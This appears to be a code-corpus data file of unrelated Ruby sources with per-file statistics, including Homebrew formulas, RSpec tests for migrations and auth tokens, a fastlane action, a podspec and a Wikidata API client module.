'"[Enable the Google Play Custom App Publishing API](https://developers.google.com/android/work/play/custom-app-api/get-started#enable_the_google_play_custom_app_publishing_api)" and "[Create a service account](https://developers.google.com/android/work/play/custom-app-api/get-started#create_a_service_account)".',
'You need the "service account\'s private key file" to continue.',
'Run the action and supply the "private key file" to it as the `json_key` parameter. The command will output a URL to visit. After logging in you are redirected to a page that outputs your "Developer Account ID" - take note of that, you will need it to be able to use [`create_app_on_managed_play_store`](https://docs.fastlane.tools/actions/create_app_on_managed_play_store/).'
].join("\n")
end
def self.example_code
[
'get_managed_play_store_publishing_rights(
json_key: "path/to/your/json/key/file"
)
# it is probably easier to execute this action directly in the command line:
# $ fastlane run get_managed_play_store_publishing_rights'
]
end
def self.available_options
[
FastlaneCore::ConfigItem.new(
key: :json_key,
env_name: "SUPPLY_JSON_KEY",
short_option: "-j",
conflicting_options: [:json_key_data],
optional: true, # optional until it is possible specify either json_key OR json_key_data are required
description: "The path to a file containing service account JSON, used to authenticate with Google",
code_gen_sensitive: true,
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:json_key_file),
default_value_dynamic: true,
verify_block: proc do |value|
UI.user_error!("Could not find service account json file at path '#{File.expand_path(value)}'") unless File.exist?(File.expand_path(value))
UI.user_error!("'#{value}' doesn't seem to be a JSON file") unless FastlaneCore::Helper.json_file?(File.expand_path(value))
end
),
FastlaneCore::ConfigItem.new(
key: :json_key_data,
env_name: "SUPPLY_JSON_KEY_DATA",
short_option: "-c",
conflicting_options: [:json_key],
optional: true,
description: "The raw service account JSON data used to authenticate with Google",
code_gen_sensitive: true,
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:json_key_data_raw),
default_value_dynamic: true,
verify_block: proc do |value|
begin
JSON.parse(value)
rescue JSON::ParserError
UI.user_error!("Could not parse service account json: JSON::ParseError")
end
end
)
]
end
def self.is_supported?(platform)
[:android].include?(platform)
end
def self.category
:misc
end
end
end
end
| 46.178862 | 387 | 0.657394 |
acf575e24e5b42a2183e4fedaa24320e314093e3 | 199 | # frozen_string_literal: true
module Emails
class CreateService < ::Emails::BaseService
def execute(extra_params = {})
@user.emails.create(@params.merge(extra_params))
end
end
end
| 19.9 | 54 | 0.713568 |
0129b237274c822c89b4c07980f0716baf33b0aa | 209 | class DebugAction < ActionFilter
def initialize(tags=nil, descs=nil)
super
require 'rubinius/debugger'
end
def before(state)
Rubinius::Debugger.start if self === state.description
end
end
| 19 | 58 | 0.717703 |
1a7994fd3bf72ab6946ab6df3b4249f2bc5957ce | 709 | require "language/node"
class Marked < Formula
desc "Markdown parser and compiler built for speed"
homepage "https://marked.js.org/"
url "https://registry.npmjs.org/marked/-/marked-4.0.2.tgz"
sha256 "01905d4e1d509fe3d0a181dfa6becfb0b8bff804d8470ce9a46c414fd8ffd089"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, all: "45b5e582505b94426abe2f03e7c4801c395435df963d7ad05fb69dcb82ff05b9"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
assert_equal "<p>hello <em>world</em></p>", pipe_output("#{bin}/marked", "hello *world*").strip
end
end
| 28.36 | 112 | 0.736248 |
333b33db52d86c77cb3f3e7da2f757a0e2caca87 | 917 | require 'socialkit'
require 'ostruct'
describe "Service::TwitterStream" do
let(:config) {OpenStruct.new :config => {"twitter" =>
{"key" => "key",
"query" => ['batman']}} }
let(:manager) { OpenStruct.new :config_reader => config}
let(:twitter) { Socialkit::Services::TwitterStream.new manager }
let(:client) {double('client', :filter => "filtering")}
before do
allow(twitter).to receive(:build_client).and_return client
end
context "Initializes" do
it "twitter" do
expect(twitter).to be_a(Socialkit::Services::TwitterStream)
end
it "sets client" do
twitter.attach
expect(twitter.client).to eql client
end
end
context "Attach Service" do
it "begins attachment" do
expect(client).to receive(:filter).with(any_args)
twitter.attach
end
end
end | 26.2 | 72 | 0.598691 |
1c82b18167105d30d5cd3d2b3889747ab155e979 | 5,149 | require 'spec_helper'
describe "index" do
let(:migration) { ::ActiveRecord::Migration }
let(:connection) { ::ActiveRecord::Base.connection }
describe "add_index" do
before(:each) do
each_table connection do |table| connection.drop_table table, cascade: true end
define_schema(:auto_create => false) do
create_table :users, :force => true do |t|
t.string :login
t.text :address
t.datetime :deleted_at
end
create_table :posts, :force => true do |t|
t.text :body
t.integer :user_id
t.integer :author_id
end
end
class User < ::ActiveRecord::Base ; end
class Post < ::ActiveRecord::Base ; end
end
after(:each) do
migration.remove_index(:users, :name => @index.name) if (@index ||= nil)
end
it "should create index when called without additional options" do
add_index(:users, :login)
expect(index_for(:login)).not_to be_nil
end
it "should create unique index" do
add_index(:users, :login, :unique => true)
expect(index_for(:login).unique).to eq(true)
end
it "should assign given name" do
add_index(:users, :login, :name => 'users_login_index')
expect(index_for(:login).name).to eq('users_login_index')
end
it "should assign order", :mysql => :skip do
add_index(:users, [:login, :deleted_at], :order => {:login => :desc, :deleted_at => :asc})
expect(index_for([:login, :deleted_at]).orders).to eq({"login" => :desc, "deleted_at" => :asc})
end
context "for duplicate index" do
it "should not complain if the index is the same" do
add_index(:users, :login)
expect(index_for(:login)).not_to be_nil
expect(ActiveRecord::Base.logger).to receive(:warn).with(/login.*Skipping/)
expect { add_index(:users, :login) }.to_not raise_error
expect(index_for(:login)).not_to be_nil
end
it "should complain if the index is different" do
add_index(:users, :login, :unique => true)
expect(index_for(:login)).not_to be_nil
expect { add_index(:users, :login) }.to raise_error
expect(index_for(:login)).not_to be_nil
end
end
protected
def index_for(column_names)
@index = User.indexes.detect { |i| i.columns == Array(column_names).collect(&:to_s) }
end
end
describe "remove_index" do
before(:each) do
each_table connection do |table| connection.drop_table table, cascade: true end
define_schema(:auto_create => false) do
create_table :users, :force => true do |t|
t.string :login
t.datetime :deleted_at
end
end
class User < ::ActiveRecord::Base ; end
end
it "removes index by column name (symbols)" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, :login
expect(User.indexes.length).to eq(0)
end
    it "removes index by column name (strings)" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index 'users', 'login'
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index by column names (symbols)" do
add_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index by column names (strings)" do
add_index 'users', [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index 'users', ['login', 'deleted_at']
expect(User.indexes.length).to eq(0)
end
it "removes index using column option" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, column: :login
expect(User.indexes.length).to eq(0)
end
it "removes index if_exists" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, :login, :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index if exists" do
add_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index :users, [:login, :deleted_at], :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "removes index if_exists using column option" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, column: :login, :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "raises exception if doesn't exist" do
expect {
remove_index :users, :login
}.to raise_error
end
it "doesn't raise exception with :if_exists" do
expect {
remove_index :users, :login, :if_exists => true
}.to_not raise_error
end
end
protected
def add_index(*args)
migration.add_index(*args)
User.reset_column_information
end
def remove_index(*args)
migration.remove_index(*args)
User.reset_column_information
end
end
| 29.422857 | 101 | 0.634881 |
62a98df380c0f11b13e80af30a7910d52bf39565 | 1,282 | # frozen_string_literal: true
module Kitchen
module Directions
module BakeCheckpoint
def self.v1(checkpoint:, number:)
checkpoint.wrap_children(class: 'os-note-body')
checkpoint.prepend(child:
<<~HTML
<div class="os-title">
<span class="os-title-label">#{I18n.t(:checkpoint)} </span>
<span class="os-number">#{number}</span>
<span class="os-divider"> </span>
</div>
HTML
)
exercise = checkpoint.exercises.first!
exercise.search("[data-type='commentary']").trash
problem = exercise.problem
problem.wrap_children(class: 'os-problem-container')
solution = exercise.solution
exercise.add_class('unnumbered') unless solution.present?
return unless solution.present?
solution.id = "#{exercise.id}-solution"
exercise.add_class('os-hasSolution')
solution.replace_children(with:
<<~HTML
<span class="os-divider"> </span>
<a class="os-number" href="##{exercise.id}">#{number}</a>
<div class="os-solution-container">#{solution.children}</div>
HTML
)
exercise.add_class('unnumbered')
end
end
end
end
| 28.488889 | 73 | 0.579563 |
08300085ce935ec45d8edd0db34154188f1d8fc3 | 956 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, 'package.json')))
Pod::Spec.new do |s|
s.name = "react-native-mapbox-gl"
s.summary = "React Native Component for Mapbox GL"
s.version = package['version']
s.authors = { "Nick Italiano" => "[email protected]" }
s.homepage = "https://github.com/@react-native-mapbox-gl/maps#readme"
s.source = { :git => "https://github.com/@react-native-mapbox-gl/maps.git" }
s.license = "MIT"
s.platform = :ios, "8.0"
s.dependency 'Mapbox-iOS-SDK', '~> 6.2.1'
s.dependency 'React'
s.subspec 'DynamicLibrary' do |sp|
sp.source_files = "ios/RCTMGL/**/*.{h,m}"
end
if ENV["REACT_NATIVE_MAPBOX_GL_USE_FRAMEWORKS"]
s.default_subspecs= ['DynamicLibrary']
else
s.subspec 'StaticLibraryFixer' do |sp|
s.dependency '@react-native-mapbox-gl-mapbox-static', '~> 5.7'
end
s.default_subspecs= ['DynamicLibrary', 'StaticLibraryFixer']
end
end
| 29.875 | 84 | 0.649582 |
abdc88df29aa62b5c88a64dfc70cd7b484e28c28 | 348 | class ChangeBookingsAcceptanceStatusDefaultToInteger < ActiveRecord::Migration
def up
remove_column :bookings, :accaptance_status
add_column :bookings, :acceptance_status, :integer, default: 0
end
def down
remove_column :bookings, :acceptance_status
add_column :bookings, :accaptance_status, :boolean, default: false
end
end
| 31.636364 | 78 | 0.784483 |
e9e03d08c7bd26cc1579674c919c1695bf5beaf7 | 1,006 | module Homeland
module Paper
class Engine < ::Rails::Engine
isolate_namespace Homeland::Paper
initializer 'homeland.paper.init' do |app|
if Setting.has_module?(:paper)
Homeland.register_plugin do |plugin|
plugin.name = 'paper'
plugin.display_name = '资料'
plugin.description = "Homeland::Paper::DESCRIPTION"
plugin.version = Homeland::Paper::VERSION
plugin.navbar_link = true
plugin.user_menu_link = false
plugin.root_path = "/papers"
plugin.admin_path = "/admin/papers"
plugin.admin_navbar_link = true
plugin.spec_path = config.root.join('spec')
end
app.routes.prepend do
mount Homeland::Paper::Engine, at: '/'
end
app.config.paths["db/migrate"].concat(config.paths["db/migrate"].expanded)
end
end
end
end
end
| 32.451613 | 84 | 0.54672 |
018d98af5e7a260c9f1476d59bd35522381874a9 | 63 | FactoryGirl.define do
factory :form_image do
end
end
| 9 | 24 | 0.698413 |
bbb3c439b02a485de4948b10abbdaae8e0384ca3 | 2,645 | class OsmGpsMap < Formula
desc "GTK+ library to embed OpenStreetMap maps"
homepage "https://nzjrs.github.com/osm-gps-map/"
url "https://github.com/nzjrs/osm-gps-map/releases/download/1.2.0/osm-gps-map-1.2.0.tar.gz"
sha256 "ddec11449f37b5dffb4bca134d024623897c6140af1f9981a8acc512dbf6a7a5"
license "GPL-2.0"
bottle do
sha256 arm64_big_sur: "8d4bfe8a748f9c06582dda25792b96b98eab8b21cec98d58b521cb8b8d4c26cf"
sha256 big_sur: "54380e69472c5e9ae483823a3ec04c8b5bde31a1cdbc581dd9e14efeed2f8324"
sha256 catalina: "c02c8a26f0a806b356e84ef628f71243007da8811b887ddcde2627f3ad763d2b"
sha256 mojave: "af136c4438f1b2ff9fd45c1c89a39db9a5703b18d766137abdf2644c8d418ac2"
end
head do
url "https://github.com/nzjrs/osm-gps-map.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "gnome-common" => :build
depends_on "gtk-doc" => :build
depends_on "libtool" => :build
end
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "gdk-pixbuf"
depends_on "glib"
depends_on "gtk+3"
depends_on "libsoup"
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--disable-silent-rules", "--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <osm-gps-map.h>
int main(int argc, char *argv[]) {
OsmGpsMap *map;
gtk_init (&argc, &argv);
map = g_object_new (OSM_TYPE_GPS_MAP, NULL);
return 0;
}
EOS
atk = Formula["atk"]
cairo = Formula["cairo"]
glib = Formula["glib"]
gdk_pixbuf = Formula["gdk-pixbuf"]
gtkx3 = Formula["gtk+3"]
harfbuzz = Formula["harfbuzz"]
pango = Formula["pango"]
flags = %W[
-I#{atk.opt_include}/atk-1.0
-I#{cairo.opt_include}/cairo
-I#{gdk_pixbuf.opt_include}/gdk-pixbuf-2.0
-I#{glib.opt_include}/glib-2.0
-I#{glib.opt_lib}/glib-2.0/include
-I#{gtkx3.opt_include}/gtk-3.0
-I#{harfbuzz.opt_include}/harfbuzz
-I#{pango.opt_include}/pango-1.0
-I#{include}/osmgpsmap-1.0
-D_REENTRANT
-L#{atk.opt_lib}
-L#{cairo.opt_lib}
-L#{gdk_pixbuf.opt_lib}
-L#{glib.opt_lib}
-L#{gtkx3.opt_lib}
-L#{lib}
-L#{pango.opt_lib}
-latk-1.0
-lcairo
-lgdk-3
-lgdk_pixbuf-2.0
-lglib-2.0
-lgtk-3
-lgobject-2.0
-lpango-1.0
-losmgpsmap-1.0
]
system ENV.cc, "test.c", "-o", "test", *flags
system "./test"
end
end
| 30.056818 | 93 | 0.636673 |
1c72a924445c98ecd35e45643d34cae90c0c924a | 1,546 | require 'twitter'
module T
module Collectable
MAX_NUM_RESULTS = 200
def collect_with_count(count, &block)
collect_with_number(count, :count, &block)
end
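    # Walks a cursored API until the final page is reached. The block receives
    # the current cursor and must return an object responding to #collection,
    # #last? and #next_cursor. Illustrative usage (the client call is assumed):
    #
    #   collect_with_cursor do |cursor|
    #     client.follower_ids("some_user", :cursor => cursor)
    #   end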
def collect_with_cursor(collection=[], cursor=-1, &block)
require 'retryable'
object = retryable(:tries => 3, :on => Twitter::Error::ServerError, :sleep => 0) do
yield cursor
end
collection += object.collection
object.last? ? collection.flatten : collect_with_cursor(collection, object.next_cursor, &block)
end
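    # Pages backwards through a timeline: each request passes the lowest id
    # seen so far minus one as max_id, stopping once an empty page is returned.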
def collect_with_max_id(collection=[], max_id=nil, &block)
require 'retryable'
array = retryable(:tries => 3, :on => Twitter::Error::ServerError, :sleep => 0) do
yield max_id
end
return collection if array.nil?
collection += array
array.empty? ? collection.flatten : collect_with_max_id(collection, array.last.id - 1, &block)
end
def collect_with_number(number, key, &block)
opts = {}
opts[key] = MAX_NUM_RESULTS
statuses = collect_with_max_id do |max_id|
opts[:max_id] = max_id unless max_id.nil?
opts[key] = number unless number >= MAX_NUM_RESULTS
if number > 0
statuses = yield opts
number -= statuses.length
statuses
end
end.flatten.compact
end
def collect_with_per_page(per_page, &block)
collect_with_number(per_page, :per_page, &block)
end
def collect_with_rpp(rpp, &block)
collect_with_number(rpp, :rpp, &block)
end
end
end
| 28.109091 | 101 | 0.644243 |
18b8eb887801463b8220542d36dbd750a38602fa | 2,610 | # encoding: UTF-8
require 'spec_helper'
describe SheetsController, search: true do
it_should_behave_like "inherit_resources with",
'sheet',
%w{new show index edit destroy}
describe 'create' do
let(:administrator) { Fabricate :administrator }
let(:skill_keyword) { Fabricate(:skill_keyword) }
let(:sheet) { Fabricate(:sheet) }
before do
sign_in(administrator)
end
it 'should add a history on sheet creation' do
expect {
post :create, sheet: {title: 'A sheet', level: 3, description: 'Something', keyword_ids: [skill_keyword.id]}
}.to change(History, :count).by(1)
sheet = Sheet.last
histories = sheet.histories
sheet.histories.size.should == 1
history = histories.first
history.user.should == administrator
history.subject.should == sheet
history.action.should == 'create'
end
it 'should add a history on sheet update' do
expect {
put :update, id: sheet.id, sheet: {title: 'A new title'}
}.to change(History, :count).by(1)
histories = sheet.histories
sheet.histories.size.should == 1
history = histories.last
history.user.should == administrator
history.subject.should == sheet
history.action.should == 'update'
end
end
describe 'show' do
let(:sheet1) { Fabricate(:sheet, title: 'First') }
let(:sheet2) { Fabricate(:sheet, title: 'Second', updated_at: sheet1.updated_at - 1.hour) }
let(:sheet3) { Fabricate(:sheet, title: 'Third', updated_at: sheet1.updated_at - 2.hour) }
before do
sheet1.save
sheet2.save
sheet3.save
Sheet.refresh_index!
session[:last_search] = {query: ''}
end
it 'should return results of the last search' do
last_search_results = controller.search_results({}).to_a
search_results = Sheet.search.perform.results.to_a
last_search_results.should eq search_results
end
it 'should return the previous result of the last search' do
get :show, id: sheet2.id
controller.previous_result.should eq sheet1
end
it 'should return the next result of the last search' do
get :show, id: sheet2.id
controller.next_result.should eq sheet3
end
    it 'should return nil when we are at the first result of the last search' do
get :show, id: sheet1.id
controller.previous_result.should be_nil
end
    it 'should return nil when we are at the last result of the last search' do
get :show, id: sheet3.id
controller.next_result.should be_nil
end
end
end
| 27.765957 | 116 | 0.657471 |
6a070d9208e2f55633e6de1eb9991def187ea63c | 273 | FactoryBot.define do
factory :project_keeper, class: 'BeachApiCore::ProjectKeeper' do
keeper { BeachApiCore::Instance.current }
after(:build) do |project_keeper|
project_keeper.project = build(:project, project_keepers: [project_keeper])
end
end
end
| 27.3 | 81 | 0.736264 |
f71c87232f9d46a9f4fc9a3bcce9820fdabbff60 | 212 | class CreatePartnerRegistrations < ActiveRecord::Migration[5.2]
def change
create_table :partner_registrations do |t|
t.string :description
t.decimal :cost
t.timestamps
end
end
end
| 19.272727 | 63 | 0.70283 |
62c9a2b0df9d7f1cee5c0cf205f5956cf0762c43 | 4,471 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
describe AuthTokensController do
it "should not allow access to admins or owners" do
sign_in( Factory(:admin) )
post :create
response.code.should eql("302")
sign_in(Factory(:quentin))
post :create
response.code.should eql("302")
end
it "should bail cleanly on missing auth_token" do
sign_in(Factory(:token_user))
post :create
response.code.should eql("422")
end
it "should bail cleanly on missing domains" do
sign_in(Factory(:token_user))
post :create, :auth_token => { :domain => 'example.org' }
response.code.should eql("404")
end
it "bail cleanly on invalid requests" do
Factory(:domain)
sign_in(Factory(:token_user))
post :create, :auth_token => { :domain => 'example.com' }
response.should have_selector('error')
end
describe "generating tokens" do
before(:each) do
sign_in(Factory(:token_user))
@domain = Factory(:domain)
@params = { :domain => @domain.name, :expires_at => 1.hour.since.to_s(:rfc822) }
end
it "with allow_new set" do
post :create, :auth_token => @params.merge(:allow_new => 'true')
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).should_not be_nil
assigns(:auth_token).domain.should eql( @domain )
assigns(:auth_token).should be_allow_new_records
end
it "with remove set" do
a = Factory(:www, :domain => @domain)
post :create, :auth_token => @params.merge(:remove => 'true', :record => ['www.example.com'])
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).remove_records?.should be_true
assigns(:auth_token).can_remove?( a ).should be_true
end
it "with policy set" do
post :create, :auth_token => @params.merge(:policy => 'allow')
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).policy.should eql(:allow)
end
it "with protected records" do
a = Factory(:a, :domain => @domain)
www = Factory(:www, :domain => @domain)
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(
:protect => ['example.com:A', 'www.example.com'],
:policy => 'allow'
)
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).should_not be_nil
assigns(:auth_token).can_change?( a ).should be_false
assigns(:auth_token).can_change?( mx ).should be_true
assigns(:auth_token).can_change?( www ).should be_false
end
it "with protected record types" do
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(:policy => 'allow', :protect_type => ['MX'])
assigns(:auth_token).can_change?( mx ).should be_false
end
it "with allowed records" do
a = Factory(:a, :domain => @domain)
www = Factory(:www, :domain => @domain)
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(:record => ['example.com'])
assigns(:auth_token).can_change?( www ).should be_false
assigns(:auth_token).can_change?( a ).should be_true
assigns(:auth_token).can_change?( mx ).should be_true
end
end
end
| 31.70922 | 99 | 0.670096 |
61f75bc3c3a1166be25fcaa610f7e112a9935901 | 2,689 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Indices
module Actions
# Returns an index template.
# This functionality is Experimental and may be changed or removed
# completely in a future release. Elastic will take a best effort approach
# to fix any issues, but experimental features are not subject to the
# support SLA of official GA features.
#
# @option arguments [List] :name The comma separated names of the index templates
# @option arguments [Boolean] :flat_settings Return settings in flat format (default: false)
# @option arguments [Time] :master_timeout Explicit operation timeout for connection to master node
# @option arguments [Boolean] :local Return local information, do not retrieve the state from master node (default: false)
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html
#
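        # @example Retrieve a single index template (illustrative usage)
        #   client.indices.get_index_template(name: 'template_1')
        #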
def get_index_template(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_name = arguments.delete(:name)
method = Elasticsearch::API::HTTP_GET
path = if _name
"_index_template/#{Utils.__listify(_name)}"
else
"_index_template"
end
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:get_index_template, [
:flat_settings,
:master_timeout,
:local
].freeze)
end
end
end
end
| 40.134328 | 130 | 0.669394 |
ac0c15d4b12941076a820901cb48ab0e50e976ce | 1,038 | # -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)
require 'test/unit/context/version'
Gem::Specification.new do |gem|
gem.name = "test-unit-context"
gem.version = Test::Unit::Context::VERSION
gem.authors = ["kares"]
gem.email = ["[email protected]"]
gem.summary = %q{Context for Test::Unit (2.x)}
gem.description = %q{Makes Test::Unit::TestCases 'contextable' and thus much
easier to read and write. If you've seen RSpec then it's the very same 'context
do ... end' re-invented for Test::Unit. Inspired by gem 'context' that does the
same for the 'old' Test::Unit 1.2.3 bundled with Ruby 1.8.x standard libraries.}
gem.homepage = "http://github.com/kares/test-unit-context"
gem.require_paths = ["lib"]
gem.files = `git ls-files`.split("\n")
gem.test_files = `git ls-files -- {test}/*`.split("\n")
gem.extra_rdoc_files = %w[ README.md LICENSE ]
gem.add_dependency 'test-unit', '>= 2.4.0'
gem.add_development_dependency 'rake'
end
| 38.444444 | 80 | 0.645472 |
268b99d3f90aa4c0a5476cd859ad5f52c57eb2a0 | 3,642 | require "spec_helper"
describe InfluxDB::PointValue do
describe "trailing 'i' adding" do
it 'should convert an int into a string with a trailing i appended' do
expected = 'ints value=42i'
point = InfluxDB::PointValue.new(series: "ints", values: { value: 42 })
actual = point.dump
expect(actual).to eq(expected)
end
it 'should not do that to anything else really' do
expected = 'floats value=1.1'
point = InfluxDB::PointValue.new(series: "floats", values: { value: 4.2 })
actual = point.dump
expect(actual).to eq(expected)
end
end
describe "whitespace escaping" do
it 'should escape series name' do
point = InfluxDB::PointValue.new(series: "Some Long String", values: { value: 5 })
expect(point.series).to eq("Some\\ Long\\ String")
end
    it 'should escape keys of passed values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { 'some string key' => 5 })
expect(point.values.split("=").first).to eq("some\\ string\\ key")
end
    it 'should escape passed tag values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { response_time: 0.34343 },
tags: { city: "Twin Peaks" })
expect(point.tags.split("=").last).to eq("Twin\\ Peaks")
end
end
describe "comma escaping" do
it 'should escape series name' do
point = InfluxDB::PointValue.new(series: "Some Long String,", values: { value: 5 })
expect(point.series).to eq("Some\\ Long\\ String\\,")
end
    it 'should escape keys of passed values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { 'some string key,' => 5 })
expect(point.values.split("=").first).to eq("some\\ string\\ key\\,")
end
    it 'should escape passed tag values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { response_time: 0.34343 },
tags: { city: "Twin Peaks," })
expect(point.tags.split("=").last).to eq("Twin\\ Peaks\\,")
end
end
describe 'dump' do
context "with all possible data passed" do
let(:expected_value) do
'responses,region=eu,status=200 value=5,threshold=0.54 1436349652'
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 },
tags: { region: 'eu', status: 200 },
timestamp: 1_436_349_652)
expect(point.dump).to eq(expected_value)
end
end
context "with no tags" do
let(:expected_value) do
"responses value=5,threshold=0.54 1436349652"
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 },
timestamp: 1_436_349_652)
expect(point.dump).to eq(expected_value)
end
end
context "with values only" do
let(:expected_value) do
"responses value=5,threshold=0.54"
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 })
expect(point.dump).to eq(expected_value)
end
end
end
end
| 35.359223 | 89 | 0.553267 |
265459d5c822db8c6ea9118f8d4a9b342c8203f0 | 684 | # elseif example
# Original example
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
if name == 'Satish'
puts 'What a nice name!!'
else
if name == 'Sunil'
puts 'Another nice name!'
end
end
# Modified example with elsif
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
if name == 'Satish'
puts 'What a nice name!!'
elsif name == 'Sunil'
puts 'Another nice name!'
end
# Further modified
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
# || is the logical or operator
if name == 'Satish' || name == 'Sunil'
puts 'What a nice name!!'
end
| 17.538462 | 38 | 0.646199 |
388c7b5ad233f3cf3c7f27b2b4e423744404c7b6 | 1,049 | RSpec.describe PartnerMailer, type: :mailer do
describe "#recertification_request" do
subject { PartnerMailer.recertification_request(partner: partner) }
let(:partner) { create(:partner) }
let(:fake_partner_base_url) { Faker::Internet.domain_name }
before do
allow(ENV).to receive(:[]).with("PARTNER_BASE_URL").and_return(fake_partner_base_url)
end
it "renders the body with text that indicates to recertify and link to where" do
expect(subject.body.encoded).to include("Hi #{partner.name}")
expect(subject.body.encoded).to include("It's time to update your agency information!")
expect(subject.body.encoded).to include("Please log in to your account at #{fake_partner_base_url}")
end
it "should be sent to the partner main email with the correct subject line" do
expect(subject.to).to eq([partner.email])
expect(subject.from).to eq(['[email protected]'])
expect(subject.subject).to eq("[Action Required] Please Update Your Agency Information")
end
end
end
| 43.708333 | 106 | 0.720686 |
035a48483492d6cdcc4b95337403ba67ac2a787f | 6,157 | # frozen_string_literal: true
module Reality::Describers::Wikidata::Impl
module Modules
# Get deleted revision information.
#
# The "submodule" (MediaWiki API term) is included in action after setting some param, providing
# additional tweaking for this param. Example (for {Reality::Describers::Wikidata::Impl::Actions::Query} and
# its submodules):
#
# ```ruby
# api.query # returns Actions::Query
# .prop(:revisions) # adds prop=revisions to action URL, and includes Modules::Revisions into action
# .limit(10) # method of Modules::Revisions, adds rvlimit=10 to URL
# ```
#
# All submodule's parameters are documented as its public methods, see below.
#
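    # For this submodule every generated parameter is prefixed with `drv`;
    # for example `.limit(10)` adds `drvlimit=10` to the request URL.
    #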
module Deletedrevisions
# Which properties to get for each revision:
#
# @param values [Array<String>] Allowed values: "ids" (The ID of the revision), "flags" (Revision flags (minor)), "timestamp" (The timestamp of the revision), "user" (User that made the revision), "userid" (User ID of the revision creator), "size" (Length (bytes) of the revision), "sha1" (SHA-1 (base 16) of the revision), "contentmodel" (Content model ID of the revision), "comment" (Comment by the user for the revision), "parsedcomment" (Parsed comment by the user for the revision), "content" (Text of the revision), "tags" (Tags for the revision), "parsetree" (The XML parse tree of revision content (requires content model wikitext)).
# @return [self]
def prop(*values)
values.inject(self) { |res, val| res._prop(val) or fail ArgumentError, "Unknown value for prop: #{val}" }
end
# @private
def _prop(value)
defined?(super) && super || ["ids", "flags", "timestamp", "user", "userid", "size", "sha1", "contentmodel", "comment", "parsedcomment", "content", "tags", "parsetree"].include?(value.to_s) && merge(drvprop: value.to_s, replace: false)
end
# Limit how many revisions will be returned.
#
# @param value [Integer, "max"]
# @return [self]
def limit(value)
merge(drvlimit: value.to_s)
end
# Expand templates in revision content (requires drvprop=content).
#
# @return [self]
def expandtemplates()
merge(drvexpandtemplates: 'true')
end
# Generate XML parse tree for revision content (requires drvprop=content; replaced by drvprop=parsetree).
#
# @return [self]
def generatexml()
merge(drvgeneratexml: 'true')
end
